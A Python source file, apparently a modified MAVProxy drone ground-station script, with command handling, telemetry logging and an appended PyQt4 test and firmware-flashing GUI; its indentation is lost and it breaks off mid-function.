MPSetting('source_component', int, 0, 'MAVLink Source component', range=(0,255), increment=1),
MPSetting('target_system', int, 0, 'MAVLink target system', range=(0,255), increment=1),
MPSetting('target_component', int, 0, 'MAVLink target component', range=(0,255), increment=1),
MPSetting('state_basedir', str, None, 'base directory for logs and aircraft directories'),
MPSetting('allow_unsigned', bool, True, 'whether unsigned packets will be accepted')
])
self.completions = {
"script" : ["(FILENAME)"],
"set" : ["(SETTING)"],
"status" : ["(VARIABLE)"],
"module" : ["list",
"load (AVAILMODULES)",
"<unload|reload> (LOADEDMODULES)"]
}
self.status = MPStatus()
# master mavlink device
self.mav_master = None
# mavlink outputs
self.mav_outputs = []
self.sysid_outputs = {}
# SITL output
self.sitl_output = None
self.mav_param = mavparm.MAVParmDict()
self.modules = []
self.public_modules = {}
self.functions = MAVFunctions()
self.select_extra = {}
self.continue_mode = False
self.aliases = {}
import platform
self.system = platform.system()
def module(self, name):
'''Find a public module (most modules are private)'''
if name in self.public_modules:
return self.public_modules[name]
return None
def master(self):
'''return the currently chosen mavlink master object'''
if len(self.mav_master) == 0:
return None
if self.settings.link > len(self.mav_master):
self.settings.link = 1
# try to use one with no link error
if not self.mav_master[self.settings.link-1].linkerror:
return self.mav_master[self.settings.link-1]
for m in self.mav_master:
if not m.linkerror:
return m
return self.mav_master[self.settings.link-1]
def get_mav_param(param, default=None):
'''return a EEPROM parameter value'''
return mpstate.mav_param.get(param, default)
def param_set(name, value, retries=3):
'''set a parameter'''
name = name.upper()
return mpstate.mav_param.mavset(mpstate.master(), name, value, retries=retries)
def cmd_script(args):
'''run a script'''
if len(args) < 1:
print("usage: script <filename>")
return
run_script(args[0])
def cmd_set(args):
'''control mavproxy options'''
mpstate.settings.command(args)
def cmd_status(args):
'''show status'''
if len(args) == 0:
mpstate.status.show(sys.stdout, pattern=None)
else:
for pattern in args:
mpstate.status.show(sys.stdout, pattern=pattern)
def cmd_setup(args):
mpstate.status.setup_mode = True
mpstate.rl.set_prompt("")
def cmd_reset(args):
print("Resetting master")
mpstate.master().reset()
def cmd_watch(args):
'''watch a mavlink packet pattern'''
if len(args) == 0:
mpstate.status.watch = None
return
mpstate.status.watch = args[0]
print("Watching %s" % mpstate.status.watch)
def load_module(modname, quiet=False):
'''load a module'''
modpaths = ['MAVProxy.modules.mavproxy_%s' % modname, modname]
for (m,pm) in mpstate.modules:
if m.name == modname:
if not quiet:
print("module %s already loaded" % modname)
return False
for modpath in modpaths:
try:
m = import_package(modpath)
reload(m)
module = m.init(mpstate)
if isinstance(module, mp_module.MPModule):
mpstate.modules.append((module, m))
if not quiet:
print("Loaded module %s" % (modname,))
return True
else:
ex = "%s.init did not return a MPModule instance" % modname
break
except ImportError as msg:
ex = msg
if mpstate.settings.moddebug > 1:
import traceback
print(traceback.format_exc())
print("Failed to load module: %s. Use 'set moddebug 3' in the MAVProxy console to enable traceback" % ex)
return False
def unload_module(modname):
'''unload a module'''
for (m,pm) in mpstate.modules:
if m.name == modname:
if hasattr(m, 'unload'):
m.unload()
mpstate.modules.remove((m,pm))
print("Unloaded module %s" % modname)
return True
print("Unable to find module %s" % modname)
return False
def cmd_module(args):
'''module commands'''
usage = "usage: module <list|load|reload|unload>"
if len(args) < 1:
print(usage)
return
if args[0] == "list":
for (m,pm) in mpstate.modules:
print("%s: %s" % (m.name, m.description))
elif args[0] == "load":
if len(args) < 2:
print("usage: module load <name>")
return
load_module(args[1])
elif args[0] == "reload":
if len(args) < 2:
print("usage: module reload <name>")
return
modname = args[1]
pmodule = None
for (m,pm) in mpstate.modules:
if m.name == modname:
pmodule = pm
if pmodule is None:
print("Module %s not loaded" % modname)
return
if unload_module(modname):
import zipimport
try:
reload(pmodule)
except ImportError:
clear_zipimport_cache()
reload(pmodule)
if load_module(modname, quiet=True):
print("Reloaded module %s" % modname)
elif args[0] == "unload":
if len(args) < 2:
print("usage: module unload <name>")
return
modname = os.path.basename(args[1])
unload_module(modname)
else:
print(usage)
def cmd_alias(args):
'''alias commands'''
usage = "usage: alias <add|remove|list>"
if len(args) < 1 or args[0] == "list":
if len(args) >= 2:
wildcard = args[1].upper()
else:
wildcard = '*'
for a in sorted(mpstate.aliases.keys()):
if fnmatch.fnmatch(a.upper(), wildcard):
print("%-15s : %s" % (a, mpstate.aliases[a]))
elif args[0] == "add":
if len(args) < 3:
print(usage)
return
a = args[1]
mpstate.aliases[a] = ' '.join(args[2:])
elif args[0] == "remove":
if len(args) != 2:
print(usage)
return
a = args[1]
if a in mpstate.aliases:
mpstate.aliases.pop(a)
else:
print("no alias %s" % a)
else:
print(usage)
return
def clear_zipimport_cache():
"""Clear out cached entries from _zip_directory_cache.
See http://www.digi.com/wiki/developer/index.php/Error_messages"""
import sys, zipimport
syspath_backup = list(sys.path)
zipimport._zip_directory_cache.clear()
# load back items onto sys.path
sys.path = syspath_backup
# add this too: see https://mail.python.org/pipermail/python-list/2005-May/353229.html
sys.path_importer_cache.clear()
# http://stackoverflow.com/questions/211100/pythons-import-doesnt-work-as-expected
# has info on why this is necessary.
def import_package(name):
"""Given a package name like 'foo.bar.quux', imports the package
and returns the desired module."""
print "module:%s\n" % name
import zipimport
try:
mod = __import__(name)
except ImportError:
clear_zipimport_cache()
mod = __import__(name)
components = name.split('.')
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
command_map = {
'script' : (cmd_script, 'run a script of MAVProxy commands'),
'setup' : (cmd_setup, 'go into setup mode'),
'reset' : (cmd_reset, 'reopen the connection to the MAVLink master'),
'status' : (cmd_status, 'show status'),
'set' : (cmd_set, 'mavproxy settings'),
'watch' : (cmd_watch, 'watch a MAVLink pattern'),
'module' : (cmd_module, 'module commands'),
'alias' : (cmd_alias, 'command aliases')
}
def process_stdin(line):
'''handle commands from user'''
if line is None:
sys.exit(0)
# allow for modules to override input handling
if mpstate.functions.input_handler is not None:
mpstate.functions.input_handler(line)
return
line = line.strip()
if mpstate.status.setup_mode:
# in setup mode we send strings straight to the master
if line == '.':
mpstate.status.setup_mode = False
mpstate.status.flightmode = "MAV"
mpstate.rl.set_prompt("MAV> ")
return
if line != '+++':
line += '\r'
for c in line:
time.sleep(0.01)
mpstate.master().write(c)
return
if not line:
return
args = shlex.split(line)
cmd = args[0]
while cmd in mpstate.aliases:
line = mpstate.aliases[cmd]
args = shlex.split(line) + args[1:]
cmd = args[0]
if cmd == 'help':
k = command_map.keys()
k.sort()
for cmd in k:
(fn, help) = command_map[cmd]
print("%-15s : %s" % (cmd, help))
return
if cmd == 'exit' and mpstate.settings.requireexit:
mpstate.status.exit = True
return
if not cmd in command_map:
for (m,pm) in mpstate.modules:
if hasattr(m, 'unknown_command'):
try:
if m.unknown_command(args):
return
except Exception as e:
print("ERROR in command: %s" % str(e))
print("Unknown command '%s'" % line)
return
(fn, help) = command_map[cmd]
try:
fn(args[1:])
except Exception as e:
print("ERROR in command %s: %s" % (args[1:], str(e)))
if mpstate.settings.moddebug > 1:
traceback.print_exc()
def process_master(m):
'''process packets from the MAVLink master'''
try:
s = m.recv(16*1024)
except Exception:
time.sleep(0.1)
return
# prevent a dead serial port from causing the CPU to spin. The user hitting enter will
# cause it to try and reconnect
if len(s) == 0:
time.sleep(0.1)
return
if (mpstate.settings.compdebug & 1) != 0:
return
if mpstate.logqueue_raw:
mpstate.logqueue_raw.put(str(s))
if mpstate.status.setup_mode:
if mpstate.system == 'Windows':
# strip nsh ansi codes
s = s.replace("\033[K","")
sys.stdout.write(str(s))
sys.stdout.flush()
return
if m.first_byte and opts.auto_protocol:
m.auto_mavlink_version(s)
msgs = m.mav.parse_buffer(s)
#print msgs
if msgs:
for msg in msgs:
sysid = msg.get_srcSystem()
if sysid in mpstate.sysid_outputs:
# the message has been handled by a specialised handler for this system
continue
if getattr(m, '_timestamp', None) is None:
m.post_message(msg)
if msg.get_type() == "BAD_DATA":
if opts.show_errors:
mpstate.console.writeln("MAV error: %s" % msg)
mpstate.status.mav_error += 1
def process_mavlink(slave):
'''process packets from MAVLink slaves, forwarding to the master'''
try:
buf = slave.recv()
except socket.error:
return
try:
if slave.first_byte and opts.auto_protocol:
slave.auto_mavlink_version(buf)
msgs = slave.mav.parse_buffer(buf)
except mavutil.mavlink.MAVError as e:
mpstate.console.error("Bad MAVLink slave message from %s: %s" % (slave.address, e.message))
return
if msgs is None:
return
if mpstate.settings.mavfwd and not mpstate.status.setup_mode:
for m in msgs:
if mpstate.status.watch is not None:
if fnmatch.fnmatch(m.get_type().upper(), mpstate.status.watch.upper()):
mpstate.console.writeln('> '+ str(m))
mpstate.master().write(m.get_msgbuf())
mpstate.status.counters['Slave'] += 1
def mkdir_p(dir):
'''like mkdir -p'''
if not dir:
return
if dir.endswith("/"):
mkdir_p(dir[:-1])
return
if os.path.isdir(dir):
return
mkdir_p(os.path.dirname(dir))
os.mkdir(dir)
def log_writer():
'''log writing thread'''
while True:
mpstate.logfile_raw.write(mpstate.logqueue_raw.get())
while not mpstate.logqueue_raw.empty():
mpstate.logfile_raw.write(mpstate.logqueue_raw.get())
while not mpstate.logqueue.empty():
mpstate.logfile.write(mpstate.logqueue.get())
if mpstate.settings.flushlogs:
mpstate.logfile.flush()
mpstate.logfile_raw.flush()
# If state_basedir is NOT set then paths for logs and aircraft
# directories are relative to mavproxy's cwd
def log_paths():
'''Returns tuple (logdir, telemetry_log_filepath, raw_telemetry_log_filepath)'''
if opts.aircraft is not None:
if opts.mission is not None:
print(opts.mission)
dirname = "%s/logs/%s/Mission%s" % (opts.aircraft, time.strftime("%Y-%m-%d"), opts.mission)
else:
dirname = "%s/logs/%s" % (opts.aircraft, time.strftime("%Y-%m-%d"))
# dirname is currently relative. Possibly add state_basedir:
if mpstate.settings.state_basedir is not None:
dirname = os.path.join(mpstate.settings.state_basedir,dirname)
mkdir_p(dirname)
highest = None
for i in range(1, 10000):
fdir = os.path.join(dirname, 'flight%u' % i)
if not os.path.exists(fdir):
break
highest = fdir
if mpstate.continue_mode and highest is not None:
fdir = highest
elif os.path.exists(fdir):
print("Flight logs full")
sys.exit(1)
logname = 'flight.tlog'
logdir = fdir
else:
logname = os.path.basename(opts.logfile)
dir_path = os.path.dirname(opts.logfile)
if not os.path.isabs(dir_path) and mpstate.settings.state_basedir is not None:
dir_path = os.path.join(mpstate.settings.state_basedir,dir_path)
logdir = dir_path
mkdir_p(logdir)
return (logdir,
os.path.join(logdir, logname),
os.path.join(logdir, logname + '.raw'))
def open_telemetry_logs(logpath_telem, logpath_telem_raw):
'''open log files'''
if opts.append_log or opts.continue_mode:
mode = 'a'
else:
mode = 'w'
mpstate.logfile = open(logpath_telem, mode=mode)
mpstate.logfile_raw = open(logpath_telem_raw, mode=mode)
print("Log Directory: %s" % mpstate.status.logdir)
print("Telemetry log: %s" % logpath_telem)
# use a separate thread for writing to the logfile to prevent
# delays during disk writes (important as delays can be long if camera
# app is running)
t = threading.Thread(target=log_writer, name='log_writer')
t.daemon = True
t.start()
def set_stream_rates():
'''set mavlink stream rates'''
if (not msg_period.trigger() and
mpstate.status.last_streamrate1 == mpstate.settings.streamrate and
mpstate.status.last_streamrate2 == mpstate.settings.streamrate2):
return
mpstate.status.last_streamrate1 = mpstate.settings.streamrate
mpstate.status.last_streamrate2 = mpstate.settings.streamrate2
for master in mpstate.mav_master:
if master.linknum == 0:
rate = mpstate.settings.streamrate
else:
rate = mpstate.settings.streamrate2
if rate != -1:
master.mav.request_data_stream_send(mpstate.settings.target_system, mpstate.settings.target_component,
mavutil.mavlink.MAV_DATA_STREAM_ALL,
rate, 1)
def check_link_status():
'''check status of master links'''
tnow = time.time()
if mpstate.status.last_message != 0 and tnow > mpstate.status.last_message + 5:
say("no link")
mpstate.status.heartbeat_error = True
for master in mpstate.mav_master:
if not master.linkerror and (tnow > master.last_message + 5 or master.portdead):
say("link %u down" % (master.linknum+1))
master.linkerror = True
def send_heartbeat(master):
if master.mavlink10():
master.mav.heartbeat_send(mavutil.mavlink.MAV_TYPE_GCS, mavutil.mavlink.MAV_AUTOPILOT_INVALID,
0, 0, 0)
else:
MAV_GROUND = 5
MAV_AUTOPILOT_NONE = 4
master.mav.heartbeat_send(MAV_GROUND, MAV_AUTOPILOT_NONE)
def periodic_tasks():
'''run periodic checks'''
if mpstate.status.setup_mode:
return
if (mpstate.settings.compdebug & 2) != 0:
return
if mpstate.settings.heartbeat != 0:
heartbeat_period.frequency = mpstate.settings.heartbeat
if heartbeat_period.trigger() and mpstate.settings.heartbeat != 0:
mpstate.status.counters['MasterOut'] += 1
for master in mpstate.mav_master:
send_heartbeat(master)
if heartbeat_check_period.trigger():
check_link_status()
set_stream_rates()
# call optional module idle tasks. These are called at several hundred Hz
for (m,pm) in mpstate.modules:
if hasattr(m, 'idle_task'):
try:
m.idle_task()
except Exception as msg:
if mpstate.settings.moddebug == 1:
print(msg)
print "1111"
elif mpstate.settings.moddebug > 1:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback,
limit=2, file=sys.stdout)
# also see if the module should be unloaded:
if m.needs_unloading:
unload_module(m.name)
def main_loop():
'''main processing loop'''
if not mpstate.status.setup_mode and not opts.nowait:
for master in mpstate.mav_master:
send_heartbeat(master)
if master.linknum == 0:
print("Waiting for heartbeat from %s" % master.address)
#master.wait_heartbeat()
set_stream_rates()
while True:
if mpstate is None or mpstate.status.exit:
return
while not mpstate.input_queue.empty():
line = mpstate.input_queue.get()
mpstate.input_count += 1
cmds = line.split(';')
if len(cmds) == 1 and cmds[0] == "":
mpstate.empty_input_count += 1
for c in cmds:
process_stdin(c)
for master in mpstate.mav_master:
#print master
if master.fd is None:
if master.port.inWaiting() > 0:
process_master(master)
periodic_tasks()
rin = []
for master in mpstate.mav_master:
#print master
if master.fd is not None and not master.portdead:
rin.append(master.fd)
for m in mpstate.mav_outputs:
rin.append(m.fd)
#print m
for sysid in mpstate.sysid_outputs:
m = mpstate.sysid_outputs[sysid]
rin.append(m.fd)
if rin == []:
time.sleep(0.0001)
continue
for fd in mpstate.select_extra:
rin.append(fd)
try:
(rin, win, xin) = select.select(rin, [], [], mpstate.settings.select_timeout)
except select.error:
continue
if mpstate is None:
return
for fd in rin:
if mpstate is None:
return
for master in mpstate.mav_master:
if fd == master.fd:
process_master(master)
if mpstate is None:
return
continue
for m in mpstate.mav_outputs:
if fd == m.fd:
process_mavlink(m)
if mpstate is None:
return
continue
for sysid in mpstate.sysid_outputs:
m = mpstate.sysid_outputs[sysid]
if fd == m.fd:
process_mavlink(m)
if mpstate is None:
return
continue
# this allow modules to register their own file descriptors
# for the main select loop
if fd in mpstate.select_extra:
try:
# call the registered read function
(fn, args) = mpstate.select_extra[fd]
fn(args)
except Exception as msg:
if mpstate.settings.moddebug == 1:
print(msg)
# on an exception, remove it from the select list
mpstate.select_extra.pop(fd)
def input_loop():
'''wait for user input'''
while mpstate.status.exit != True:
try:
if mpstate.status.exit != True:
line = raw_input(mpstate.rl.prompt)
except EOFError:
mpstate.status.exit = True
sys.exit(1)
if line == "exit":
mpstate.status.exit = True
continue
if line == "burn":
#print "get stick"
burnshow.show()
continue
if line == "stick":
print "get stick"
#myshow.show()
continue
if line == "unstick":
print "delete stick"
#myshow.close()
continue
mpstate.input_queue.put(line)
def run_script(scriptfile):
'''run a script file'''
try:
f = open(scriptfile, mode='r')
except Exception:
return
mpstate.console.writeln("Running script %s" % scriptfile)
for line in f:
line = line.strip()
if line == "" or line.startswith('#'):
continue
if line.startswith('@'):
line = line[1:]
else:
mpstate.console.writeln("-> %s" % line)
process_stdin(line)
f.close()
if __name__ == '__main__':
from optparse import OptionParser
parser = OptionParser("mavproxy.py [options]")
parser.add_option("--master", dest="master", action='append',
metavar="DEVICE[,BAUD]", help="MAVLink master port and optional baud rate",
default=[])
parser.add_option("--out", dest="output", action='append',
metavar="DEVICE[,BAUD]", help="MAVLink output port and optional baud rate",
default=[])
parser.add_option("--baudrate", dest="baudrate", type='int',
help="default serial baud rate", default=57600)
parser.add_option("--sitl", dest="sitl", default=None, help="SITL output port")
parser.add_option("--streamrate",dest="streamrate", default=4, type='int',
help="MAVLink stream rate")
parser.add_option("--source-system", dest='SOURCE_SYSTEM', type='int',
default=255, help='MAVLink source system for this GCS')
parser.add_option("--source-component", dest='SOURCE_COMPONENT', type='int',
default=0, help='MAVLink source component for this GCS')
parser.add_option("--target-system", dest='TARGET_SYSTEM', type='int',
default=0, help='MAVLink target master system')
parser.add_option("--target-component", dest='TARGET_COMPONENT', type='int',
default=0, help='MAVLink target master component')
parser.add_option("--logfile", dest="logfile", help="MAVLink master logfile",
default='mav.tlog')
parser.add_option("-a", "--append-log", dest="append_log", help="Append to log files",
action='store_true', default=False)
parser.add_option("--quadcopter", dest="quadcopter", help="use quadcopter controls",
action='store_true', default=False)
parser.add_option("--setup", dest="setup", help="start in setup mode",
action='store_true', default=False)
parser.add_option("--nodtr", dest="nodtr", help="disable DTR drop on close",
action='store_true', default=False)
parser.add_option("--show-errors", dest="show_errors", help="show MAVLink error packets",
action='store_true', default=False)
parser.add_option("--speech", dest="speech", help="use text to speach",
action='store_true', default=False)
parser.add_option("--aircraft", dest="aircraft", help="aircraft name", default=None)
parser.add_option("--cmd", dest="cmd", help="initial commands", default=None, action='append')
parser.add_option("--console", action='store_true', help="use GUI console")
parser.add_option("--map", action='store_true', help="load map module")
parser.add_option("--hardware", action='store_true', help="load hardware module")
parser.add_option(
'--load-module',
action='append',
default=[],
help='Load the specified module. Can be used multiple times, or with a comma separated list')
parser.add_option("--mav09", action='store_true', default=False, help="Use MAVLink protocol 0.9")
parser.add_option("--mav20", action='store_true', default=False, help="Use MAVLink protocol 2.0")
parser.add_option("--auto-protocol", action='store_true', default=False, help="Auto detect MAVLink protocol version")
parser.add_option("--nowait", action='store_true', default=False, help="don't wait for HEARTBEAT on startup")
parser.add_option("-c", "--continue", dest='continue_mode', action='store_true', default=False, help="continue logs")
#parser.add_option("--dialect", default="ardupilotmega", help="MAVLink dialect")
parser.add_option("--dialect", default="brisky", help="MAVLink dialect")
parser.add_option("--rtscts", action='store_true', help="enable hardware RTS/CTS flow control")
parser.add_option("--moddebug", type=int, help="module debug level", default=0)
parser.add_option("--mission", dest="mission", help="mission name", default=None)
parser.add_option("--daemon", action='store_true', help="run in daemon mode, do not start interactive shell")
parser.add_option("--profile", action='store_true', help="run the Yappi python profiler")
parser.add_option("--state-basedir", default=None, help="base directory for logs and aircraft directories")
parser.add_option("--version", action='store_true', help="version information")
#parser.add_option("--default-modules", default="log,signing,wp,rally,fence,param,relay,tuneopt,arm,mode,calibration,rc,auxopt,misc,cmdlong,battery,terrain,output,adsb", help='default module list')
parser.add_option("--default-modules", default="dataflash_logger,airbeetest,log,signing,rally,fence,param,relay,tuneopt,arm,mode,calibration,rc,auxopt,misc,cmdlong,battery,terrain,output,adsb", help='default module list')
(opts, args) = parser.parse_args()
# warn people about ModemManager which interferes badly with APM and Pixhawk
if os.path.exists("/usr/sbin/ModemManager"):
print("WARNING: You should uninstall ModemManager as it conflicts with APM and Pixhawk")
if opts.mav09:
os.environ['MAVLINK09'] = '1'
if opts.mav20:
os.environ['MAVLINK20'] = '1'
from pymavlink import mavutil, mavparm
mavutil.set_dialect(opts.dialect)
#version information
if opts.version:
import pkg_resources
version = pkg_resources.require("mavproxy")[0].version
print ("MAVProxy is a modular ground station using the mavlink protocol")
print ("MAVProxy Version: " + version)
sys.exit(1)
# global mavproxy state
mpstate = MPState()
mpstate.status.exit = False
mpstate.command_map = command_map
mpstate.continue_mode = opts.continue_mode
# queues for logging
mpstate.logqueue = Queue.Queue()
mpstate.logqueue_raw = Queue.Queue()
mpstate.uiqueue = Queue.Queue()
if opts.speech:
# start the speech-dispatcher early, so it doesn't inherit any ports from
# modules/mavutil
load_module('speech')
if not opts.master:
serial_list = mavutil.auto_detect_serial(preferred_list=['*FTDI*',"*Arduino_Mega_2560*", "*3D_Robotics*", "*USB_to_UART*", '*PX4*', '*FMU*'])
print('Auto-detected serial ports are:')
for port in serial_list:
print("%s" % port)
# container for status information
mpstate.settings.target_system = opts.TARGET_SYSTEM
mpstate.settings.target_component = opts.TARGET_COMPONENT
mpstate.mav_master = []
mpstate.rl = rline.rline("MAV> ", mpstate)
def quit_handler(signum = None, frame = None):
#print 'Signal handler called with signal', signum
if mpstate.status.exit:
print ('Clean shutdown impossible, forcing an exit')
sys.exit(0)
else:
mpstate.status.exit = True
# Listen for kill signals to cleanly shutdown modules
fatalsignals = [signal.SIGTERM]
try:
fatalsignals.append(signal.SIGHUP)
fatalsignals.append(signal.SIGQUIT)
except Exception:
pass
if opts.daemon: # SIGINT breaks readline parsing - if we are interactive, just let things die
fatalsignals.append(signal.SIGINT)
for sig in fatalsignals:
signal.signal(sig, quit_handler)
load_module('link', quiet=True)
mpstate.settings.source_system = opts.SOURCE_SYSTEM
mpstate.settings.source_component = opts.SOURCE_COMPONENT
# open master link
for mdev in opts.master:
if not mpstate.module('link').link_add(mdev):
sys.exit(1)
if not opts.master and len(serial_list) == 1:
print("Connecting to %s" % serial_list[0])
mpstate.module('link').link_add(serial_list[0].device)
elif not opts.master:
#wifi_device = '0.0.0.0:14550'
wifi_device = 'udp:0.0.0.0:14550'
#wifi_device = 'tcp:192.168.1.1:10000'
mpstate.module('link').link_add(wifi_device)
# open any mavlink output ports
for port in opts.output:
mpstate.mav_outputs.append(mavutil.mavlink_connection(port, baud=int(opts.baudrate), input=False))
if opts.sitl:
mpstate.sitl_output = mavutil.mavudp(opts.sitl, input=False)
mpstate.settings.streamrate = opts.streamrate
mpstate.settings.streamrate2 = opts.streamrate
if opts.state_basedir is not None:
mpstate.settings.state_basedir = opts.state_basedir
msg_period = mavutil.periodic_event(1.0/15)
heartbeat_period = mavutil.periodic_event(1)
heartbeat_check_period = mavutil.periodic_event(0.33)
mpstate.input_queue = Queue.Queue()
mpstate.input_count = 0
mpstate.empty_input_count = 0
if opts.setup:
mpstate.rl.set_prompt("")
# call this early so that logdir is setup based on --aircraft
(mpstate.status.logdir, logpath_telem, logpath_telem_raw) = log_paths()
if not opts.setup:
# some core functionality is in modules
standard_modules = opts.default_modules.split(',')
for m in standard_modules:
load_module(m, quiet=True)
if opts.console:
process_stdin('module load console')
if opts.map:
process_stdin('module load map')
for module in opts.load_module:
modlist = module.split(',')
for mod in modlist:
process_stdin('module load %s' % mod)
if 'HOME' in os.environ and not opts.setup:
start_script = os.path.join(os.environ['HOME'], ".mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
if 'LOCALAPPDATA' in os.environ and not opts.setup:
start_script = os.path.join(os.environ['LOCALAPPDATA'], "MAVProxy", "mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
if opts.aircraft is not None:
start_script = os.path.join(opts.aircraft, "mavinit.scr")
if os.path.exists(start_script):
run_script(start_script)
else:
print("no script %s" % start_script)
if opts.cmd is not None:
for cstr in opts.cmd:
cmds = cstr.split(';')
for c in cmds:
process_stdin(c)
if opts.profile:
import yappi # We do the import here so that we won't barf if run normally and yappi not available
yappi.start()
# log all packets from the master, for later replay
open_telemetry_logs(logpath_telem, logpath_telem_raw)
# run main loop as a thread
mpstate.status.thread = threading.Thread(target=main_loop, name='main_loop')
mpstate.status.thread.daemon = True
mpstate.status.thread.start()
#add the ui test code !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!1
#coding:utf-8
from PyQt4 import QtCore, QtGui
from PyQt4.QtGui import QFileDialog,QHBoxLayout,QPalette
from test2 import Ui_MainWindow
from burn import Ui_MainWindow_burn
from PyQt4.QtCore import QDir
import platform
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.figure import Figure
from matplotlib import animation
import numpy as np
from matplotlib import pyplot as plt
import random
class WorkThread(QtCore.QThread):
"""workthread to avoid the wt hang"""
def __init__(self, _func):
super(WorkThread, self).__init__()
self._func = _func
def run(self):
process_stdin(self._func)
class UIThread(QtCore.QThread):
"""workthread to add the ui"""
finishSignal = QtCore.pyqtSignal(str)
imu_Signal = QtCore.pyqtSignal(dict)
def __init__(self):
super(UIThread, self).__init__()
def run(self):
while not mpstate.status.exit:
#time.sleep(0.1)
try:
if mpstate.status.exit:
print "!!!!!!!!!!!!!exit while!!!!!!"
break
else:
#print mpstate.status.exit
pass
_log = mpstate.uiqueue.get()
if isinstance(_log,dict):
self.imu_Signal.emit(_log)
pass
else:
self.finishSignal.emit(_log)
pass
except KeyboardInterrupt:
break
#self.textEdit.setPlainText(str(_log))
#def __del__(self):
# self.wait()
class BurnWindow(QtGui.QMainWindow,Ui_MainWindow_burn):
def __init__(self):
super(BurnWindow,self).__init__()
self.setupUi(self)
self._dis = [0 for i in range(100)]
self._dis_max = 5
self._dis_min = 0
self.x_acc_list = []
self.y_acc_list = []
self.z_acc_list = []
self.x_gyro_list = []
self.y_gyro_list = []
self.z_gyro_list = []
self.x_mag_list = []
self.y_mag_list = []
self.z_mag_list = []
self.distance_list = [0 for i in range(20)]
self.abs_pressure_list = [0 for i in range(20)]
self.test_num = 500
self.test_num_ui = 200
self.x_acc_log = []
self.y_acc_log = []
self.z_acc_log = []
self.x_gyro_log = []
self.y_gyro_log = []
self.z_gyro_log = []
self.x_mag_log = []
self.y_mag_log = []
self.z_mag_log = []
self.distance_log = []
self.abs_pressure_log = []
self.temp_log = []
self.temp = 0
self.imu_test_tag = 0
self._createFigures()
self._createLayouts()
self.pe = QPalette()
self.pe.setColor(QPalette.WindowText,QtCore.Qt.red)
self.pe_black = QPalette()
self.pe_black.setColor(QPalette.WindowText,QtCore.Qt.black)
self._uithread = UIThread()
self._uithread.finishSignal.connect(self.write_console)
self._uithread.imu_Signal.connect(self.write_imu)
try:
self._uithread.start()
except KeyboardInterrupt:
print "exit!!!"
#self._uithread.setDaemon(True)
def _createFigures(self):
#self._fig = Figure(figsize=(80, 60), dpi=100, tight_layout=True)
#self._fig = Figure()
self._fig = plt.figure()
#self._fig.set_facecolor("#F5F5F5") # ่ๆฏ่ฒ
#self._fig.subplots_adjust(left=0.08, top=0.92, right=0.95, bottom=0.1)
self._canvas = FigureCanvas(self._fig) # ็ปๅธ
self._ax = self._fig.add_subplot(111) # ๅขๅ subplot
#self._ax = plt.axes(xlim=(0, 2), ylim=(-2, 2))
#self._ax.hold(True)
self._initializeFigure()
def _initializeFigure(self):
#Font = {'family': 'Tahoma',
# 'weight': 'bold',
# 'size': 10}
# Abscissa
#self._ax.set_xlim([380, 780])
#self._ax.set_xticks([380, 460, 540, 620, 700, 780])
#self._ax.set_xticklabels([380, 460, 540, 620, 700, 780], fontdict=Font)
self._ax.set_xlabel("time")
# Ordinate
#self._ax.set_ylim([0.0, 1.0])
#self._ax.set_yticks(np.arange(0.0, 1.1, 0.2))
#self._ax.set_yticklabels(np.arange(0.0, 1.1, 0.2), fontdict=Font)
self._ax.set_ylabel("value")
self._ax.grid(True)
self.line, = self._ax.plot(self._dis)
def _createLayouts(self):
layout = QHBoxLayout(self.frame)
#layout.setContentsMargins(0, 0, 0, 0)
layout.addWidget(self._canvas) # Add Matplotli
def _init(self):
self.line.set_data([])
return self.line,
def imu_test(self):
#process_stdin("imu_test")
process_stdin("wifi")
#sys.path.append("/home/user/git/test_tool/MAVProxy-master/MAVProxy/modules")
#print sys.path
#import mavproxy_airbeetest
#self.airbee_test = mavproxy_airbeetest.AirbeetestModule(mpstate)
if self.imu_test_tag == 0:
self.imu_to_excel()
self.imu_test_tag = 1
else:
self.save_imu_to_excel()
self.imu_test_tag = 0
def ESC_test(self):
process_stdin("arm throttle")
time.sleep(2)
process_stdin("disarm")
def boot_time(self):
process_stdin("pressure 1")
def connect(self):
process_stdin("link add udp:0.0.0.0:14550")
def disconnect(self):
process_stdin("link remove 0")
def animate(self, i):
x = self.x
y = i
self._ax.set_ylim([self._dis_min, self._dis_max])
self.line.set_ydata(i)
return self.line,
def data_gen(self):
while 1:
#self._dis = self._dis[1:]+self._dis
#print self._dis
yield(self._dis)
def on_radioButton_clicked(self):
anim1=animation.FuncAnimation(self._fig, self.animate,self.data_gen,interval=100)
#init_func=self._init,
self._canvas.draw()
#self._ax.clear()
if self.radioButton_dis.isChecked():
pass
def versions(self):
process_stdin("versions")
def wifi(self):
#print ('start bsp burn')
process_stdin("wifi")
def check_log(self):
#print ('start bsp burn')
process_stdin("check_log")
def app_version(self):
#print ('start bsp burn')
process_stdin("app_version")
def bsp(self):
#print ('start bsp burn')
self._bsp = WorkThread("bsp")
self._bsp.start()
#process_stdin('bsp')
def airbee(self):
#print ('start airbee burn')
self._airbee = WorkThread("airbee")
self._airbee.start()
#self.textEdit.setPlainText("bbbb")
#process_stdin('airbee')
def bsp_click(self):
if platform.system() == "Linux":
bsp_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/jenkins/release/bsp',"txt files (*.sh)")
if platform.system() == "Windows":
bsp_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/',"txt files (*.bat)")
if bsp_file_path:
self.bsp_dir_lineEdit.setText(bsp_file_path)
mpstate.bsp_dir,mpstate.bsp_name = os.path.split(str(bsp_file_path))
print mpstate.bsp_dir,mpstate.bsp_name
process_stdin("set_build_dir")
def app_click(self):
if platform.system() == "Linux":
app_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'/home/jenkins/release/AirBee',"txt files (*.sh)")
if platform.system() == "Windows":
app_file_path = QFileDialog.getOpenFileName(self, 'Open file',
'F:/tools/build_tool',"txt files (*.bat)")
if app_file_path:
self.app_dir_lineEdit.setText(app_file_path)
mpstate.app_dir,mpstate.app_name = os.path.split(str(app_file_path))
print mpstate.app_dir,mpstate.app_name
process_stdin("set_build_dir")
def log_click(self):
